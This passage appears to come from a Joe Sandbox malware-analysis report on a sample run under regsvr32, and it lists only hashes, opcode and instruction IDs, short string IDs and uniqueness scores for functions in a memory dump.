                                                                                                                                                                                                                    • Instruction ID: 6955828c129030b22ddf7977e59ae3a49101d5d1312b29c3db37621326d0cc1a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f58a98b4df58fdce72c0e7885dd3d804ba7ef7258294e614851e5dfa350b3c1c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A71201B560560DCBDB68DF38C48A49E3BE1FB58304F20512DFC269B2A2D774E964CB85
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: #X$h}
                                                                                                                                                                                                                    • API String ID: 0-3021649463
                                                                                                                                                                                                                    • Opcode ID: b2db15c3223b800cd4780d66961112dd0400bb09218d3434ebea1e418095f42e
                                                                                                                                                                                                                    • Instruction ID: 38957f0bad7bb931e04704448e8c8fe3e6b754b8493b2d92a4616e5ab908077c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b2db15c3223b800cd4780d66961112dd0400bb09218d3434ebea1e418095f42e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0922A8709093888BEBF8DF24C889AD97BF1FF44714F90251ED84E9AA50DB786645CF42
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: #X$+ <
                                                                                                                                                                                                                    • API String ID: 0-1007305072
                                                                                                                                                                                                                    • Opcode ID: 3c586b07ab88afffe82ef26e7c4153d46f18f2014baa5345a66543dbad760a18
                                                                                                                                                                                                                    • Instruction ID: a9b5e7b6e252fbbe080916ce478756cbc3fb6ad2e752a0289382347dc20e60a6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c586b07ab88afffe82ef26e7c4153d46f18f2014baa5345a66543dbad760a18
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E0278B5900709CFDB88CF68C58A5DD7BB9FB59308F404129FC1E9A2A0D3B4E919CB56
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: Hc$aYG
                                                                                                                                                                                                                    • API String ID: 0-2147329803
                                                                                                                                                                                                                    • Opcode ID: df90cc9616f2b9c1c24e5989ebcf8fe6102b1266bf85ba7b7bee55ae89225232
                                                                                                                                                                                                                    • Instruction ID: d6554eb8db8ad93978d47032b2895c055948e76a36dcad67029ea10705f06477
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df90cc9616f2b9c1c24e5989ebcf8fe6102b1266bf85ba7b7bee55ae89225232
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10D1207560170DCBDB68DF28C58A59E3BE9FF55308F104129FC1A862A5C7B8E829CB46
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: Ip$2/
                                                                                                                                                                                                                    • API String ID: 0-2558650176
                                                                                                                                                                                                                    • Opcode ID: e91aca82e16051f92f6dbdf3cee4f537082049766ade2dd9d76858b25ebc0c60
                                                                                                                                                                                                                    • Instruction ID: 7acea227ae7ac49e30fb7263f09af3770583b4101a49082b1a00ecb8d1d225d8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e91aca82e16051f92f6dbdf3cee4f537082049766ade2dd9d76858b25ebc0c60
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2AE1D270505B888FEBB8DF28CC89BEB7BA1FB44306F20551ED84A9E290DB745685CF41
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateProcess
                                                                                                                                                                                                                    • String ID: h$j-`
                                                                                                                                                                                                                    • API String ID: 963392458-2572860821
                                                                                                                                                                                                                    • Opcode ID: 7cf89bdd1f68ee687de5045feafb6fc4a467e2c1ecf066370c920de17f50795b
                                                                                                                                                                                                                    • Instruction ID: 46da411c0898e25d55b3175716ce99ead81591ae168872d1f082a32370197b37
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cf89bdd1f68ee687de5045feafb6fc4a467e2c1ecf066370c920de17f50795b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40C1F471904788CFDF6CDFA8C88A59DBBB1FB58308F20421DE916AB661DBB49805CF41
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: #z$UP
                                                                                                                                                                                                                    • API String ID: 0-3609392360
                                                                                                                                                                                                                    • Opcode ID: 550135c457ce9de0a38fa7ba25efe375c5c92efa4962973150589f83c0e84419
                                                                                                                                                                                                                    • Instruction ID: 061773e5afa73dd7a523fa4d13f43c5e2cc6ba2fbea13d9eecbe7917d33aa3d9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 550135c457ce9de0a38fa7ba25efe375c5c92efa4962973150589f83c0e84419
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6A131719046099BDF58DFA8E4CA49EBBB1FB64348F204119F852A72A0CB749A95CFC1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: )bkr$z~
                                                                                                                                                                                                                    • API String ID: 0-4035444816
                                                                                                                                                                                                                    • Opcode ID: 5b38f0d840313d9f3ca574d07702ced70b63c221434e660478dd8723dd507398
                                                                                                                                                                                                                    • Instruction ID: 630bf825ed1c9a155eeac407753b8e51a534be41cd6d36ed318f51741a26de9e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b38f0d840313d9f3ca574d07702ced70b63c221434e660478dd8723dd507398
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED819F715147888FEBB8CF28CC867D937A1FB45314F608129D98ECA292DF785A89DB41
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: aK>$NM
                                                                                                                                                                                                                    • API String ID: 0-1076587397
                                                                                                                                                                                                                    • Opcode ID: c3bac648abfba249b47852098d41859ba07369c2655e972e771b32b502ff7dc2
                                                                                                                                                                                                                    • Instruction ID: 5bf3ebd87048d18b0328b6e712231ad9f28fc3b727bb6dff860b24d92f9c320e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3bac648abfba249b47852098d41859ba07369c2655e972e771b32b502ff7dc2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CDB144B590030DCFDB98CF28C18A98D7BB8FB55348F505129FC1E9A2A1E3B5E614CB56
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: GcX$cy5X
                                                                                                                                                                                                                    • API String ID: 0-3427037236
                                                                                                                                                                                                                    • Opcode ID: 31dac3876fb2c8203566e989269622a41f053c7142211a7d3c88141b18e189f4
                                                                                                                                                                                                                    • Instruction ID: 799193144675d51c2cfa2f1d1e017718c35673fa40cbca1cf1d0241d7af3923b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 31dac3876fb2c8203566e989269622a41f053c7142211a7d3c88141b18e189f4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65A1C6B0548388CBEBBEDF34C89A6D93BA9FB45B04F504619E80E8E291DF745785CB41
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: &$U
                                                                                                                                                                                                                    • API String ID: 0-326847644
                                                                                                                                                                                                                    • Opcode ID: abfcacae90548ec85c0fd9e6913092660ec18354f469de3349c35ab14c6f872b
                                                                                                                                                                                                                    • Instruction ID: 410f039d0303131ef144aba83379e69dd0b5bb2faaa8f237d5fd4770d282e5aa
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: abfcacae90548ec85c0fd9e6913092660ec18354f469de3349c35ab14c6f872b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 829169B590038E8FDF48CF68D88A5DE7BB0FB14348F104A19FC66AA250D7B4D665CB94
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: k' {$z5
                                                                                                                                                                                                                    • API String ID: 0-3484172565
                                                                                                                                                                                                                    • Opcode ID: 0e04fcac124a95f8f36ba453d1c940f3a314ae21d4948ab7b59fa2d7b687fabd
                                                                                                                                                                                                                    • Instruction ID: 3f98c79503024b2bd4cd8d39d7b47017582e39fd97e5a33050955f51a5118224
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e04fcac124a95f8f36ba453d1c940f3a314ae21d4948ab7b59fa2d7b687fabd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4271F5706007498FDB48DF24C88A5DA7BA1FB58358F114329FC8AAB260D778D994CF89
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 6$D
                                                                                                                                                                                                                    • API String ID: 0-3309211938
                                                                                                                                                                                                                    • Opcode ID: 28cfe374c9252ae38f661a0063e52509a8c1d1e6d70719d53b6096594a4bb1b4
                                                                                                                                                                                                                    • Instruction ID: c9625528b51d4538af2439c9ec6a379fe1e5aedabe15e0ff510e91c82749102f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28cfe374c9252ae38f661a0063e52509a8c1d1e6d70719d53b6096594a4bb1b4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C75147705247899BDB98CF68DC899993BE5FB05308F90626CFC4AC7292C774D886CB41
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: #T$(Pv0
                                                                                                                                                                                                                    • API String ID: 0-2531358951
                                                                                                                                                                                                                    • Opcode ID: 75b81112f69fa21036012adbd1b3eca6c2c2cdc881b6fb35e88803ec9910d9b1
                                                                                                                                                                                                                    • Instruction ID: 280112e244baba2d5050ab1319f1fff76bf09b0706049692c268f3011d1f1a4b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75b81112f69fa21036012adbd1b3eca6c2c2cdc881b6fb35e88803ec9910d9b1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59513F7050030E8BDF58DF18C88A4DE3BA1FB28398F251619FC4A96694D778D995CFC5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: $$%9
                                                                                                                                                                                                                    • API String ID: 0-3031553271
                                                                                                                                                                                                                    • Opcode ID: a2fbf9250aa57a4feebe03f3fe744e7023f0b6fc9b26e85352855d54e5bc5225
                                                                                                                                                                                                                    • Instruction ID: cf95c1c463ba01e9d6269a37f88ef2df1deec88a3eb23f361f77a7b01f0f85fe
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a2fbf9250aa57a4feebe03f3fe744e7023f0b6fc9b26e85352855d54e5bc5225
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE416D7061C784ABD798EF18C4C562BBAE2FB99314F90692EF486C7391C738C9448B46
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: gd$s=z
                                                                                                                                                                                                                    • API String ID: 0-3301279615
                                                                                                                                                                                                                    • Opcode ID: 9e0a1eb710f150882f220fbe0277e01504bf60581961d70543420594e9a038f4
                                                                                                                                                                                                                    • Instruction ID: f384fa0d289b2c9e377d125eb7ffaa2ce0b45709ce8358cc4d5e7b3eb07f6d02
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e0a1eb710f150882f220fbe0277e01504bf60581961d70543420594e9a038f4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E51E2B190030A8FDB48CF68D48A5DE7FB1FB68388F204219F856A6250D37886A4CFD5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: !oW!$ke&Q
                                                                                                                                                                                                                    • API String ID: 0-419570616
                                                                                                                                                                                                                    • Opcode ID: e2a8cd98534a9e183c53210f0dafbd08af185e336335754ed42f3b5ed718b376
                                                                                                                                                                                                                    • Instruction ID: 12efbcb2ac887a1b1a11c3de841e770a55aebebae0c5ebb5705ce0cbe99f0c65
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2a8cd98534a9e183c53210f0dafbd08af185e336335754ed42f3b5ed718b376
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E351D5B090074E8FDB48CF68C88A5DE7FB0FB68398F104619EC55A6290D7B496A5CFD4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: ?j|$P
                                                                                                                                                                                                                    • API String ID: 0-615948335
                                                                                                                                                                                                                    • Opcode ID: 9620d1bc63c4dfd4b8964090179e5af9b100705a6683f45fc5812d04fd3ae6d4
                                                                                                                                                                                                                    • Instruction ID: 4d074c54907b746f7a435c62db252147f72bf76a5f12364168b1e009207b0c5e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9620d1bc63c4dfd4b8964090179e5af9b100705a6683f45fc5812d04fd3ae6d4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3941D3B090034A8FDB88CF64C48A5DE7FB1FB68388F50461DE816A6390D77896A4CFD1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: %$aI
                                                                                                                                                                                                                    • API String ID: 0-3604358270
                                                                                                                                                                                                                    • Opcode ID: ea798d718599b15374f3be6d712fc75d69b65069e54809637e576d117a3edd33
                                                                                                                                                                                                                    • Instruction ID: 42695c6cdd50e83c0fc52d5a6ca8e6daea3218032d6a4c8eebd35e80d9e41f74
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea798d718599b15374f3be6d712fc75d69b65069e54809637e576d117a3edd33
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2841C6B190038A8BCF48DF64C99A5DE7BB1FB48358F114A2DF86697350D3B49664CF84
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: j$[
                                                                                                                                                                                                                    • API String ID: 0-3696242357
                                                                                                                                                                                                                    • Opcode ID: d41960ad032d02aa43a06cacd4c3fdf514c501a5b8f19463d910750cf599ef8a
                                                                                                                                                                                                                    • Instruction ID: 420594bf58de8359035b6798069ecf057bcd7ee44a5ef1fbdd316e0a5a03d494
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d41960ad032d02aa43a06cacd4c3fdf514c501a5b8f19463d910750cf599ef8a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6041E5B090074E8BDB48DF64C48A5DE7FB1FB58398F11861DE856A6290D3B4D6A4CFC1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: + $S"
                                                                                                                                                                                                                    • API String ID: 0-2880694137
                                                                                                                                                                                                                    • Opcode ID: 0a120380ba46ade300821e018fa54fd0c93605979f7eaf18b3fcea56eb471111
                                                                                                                                                                                                                    • Instruction ID: b511db0e43d0be354c07eb9d69f6706c208f70d34a6ce255accf4d3565763c48
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a120380ba46ade300821e018fa54fd0c93605979f7eaf18b3fcea56eb471111
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A251B6B090078E8FDF88DF64C88A5DE7BB0FB58354F10461DE866A6250D3B8D665CF85
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: =K$d%
                                                                                                                                                                                                                    • API String ID: 0-2790768846
                                                                                                                                                                                                                    • Opcode ID: 046eeb3a7e312ef4597a0ceadb2c0b4017743bcb75cc6b1a2b492f4bea5b2233
                                                                                                                                                                                                                    • Instruction ID: 0dde61fb382c0c43ee5596d33f064973ff59dcfbfcf415162a0b87b0f0e6bd1b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 046eeb3a7e312ef4597a0ceadb2c0b4017743bcb75cc6b1a2b492f4bea5b2233
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9541E4B090074E8BDF48CF64C88A5DE7BF1FB58358F104A1DE86AA6250D3B89665CF85
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: #|$`
                                                                                                                                                                                                                    • API String ID: 0-1687004633
                                                                                                                                                                                                                    • Opcode ID: 1dbd93d6a4af5ab501e4fd27d4ca136d79918f9d458c9bd4a0bbcc41cb67c6cc
                                                                                                                                                                                                                    • Instruction ID: a413690b819c3abbd63fa3366045c6776b8d3786bb145cb6eaf9befc672f2af1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1dbd93d6a4af5ab501e4fd27d4ca136d79918f9d458c9bd4a0bbcc41cb67c6cc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6041C4B190078E8FDF88CF68C88A4DE7BF0FB58358F014619F856A6250D3B89665CF85
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: c$j~;
                                                                                                                                                                                                                    • API String ID: 0-3832213246
                                                                                                                                                                                                                    • Opcode ID: 18b6bb2236c3d81442985b19945feacbaaab319f380d4d3d69fe49ad0df2425e
                                                                                                                                                                                                                    • Instruction ID: 5f46f7608e9f6df0a921efd0cac53531c401a79ffb41761038378c79bba3b19c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18b6bb2236c3d81442985b19945feacbaaab319f380d4d3d69fe49ad0df2425e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F041A5B080078E8FDB88DF64C88A5DF7BB0FB58358F104A19EC6696250D7B49661CFD5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
